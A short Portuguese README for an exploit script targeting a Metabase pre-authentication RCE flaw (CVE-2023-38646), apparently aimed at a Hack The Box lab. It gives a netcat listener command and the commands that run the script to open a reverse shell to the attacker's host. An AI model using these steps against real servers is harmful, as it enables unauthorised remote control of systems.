
Exploit Python para RCE pré-autenticação no Metabase (CVE-2023-38646) que estabelece um shell reverso para testes de segurança autorizados.
⚠️ Apenas para fins educacionais e de pesquisa de segurança autorizada
Muito grato ao autor do PoC original securezeron
Configure o Listener na sua máquina atacante:
nc -nlvp 4444
Em seguida, execute este comando:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
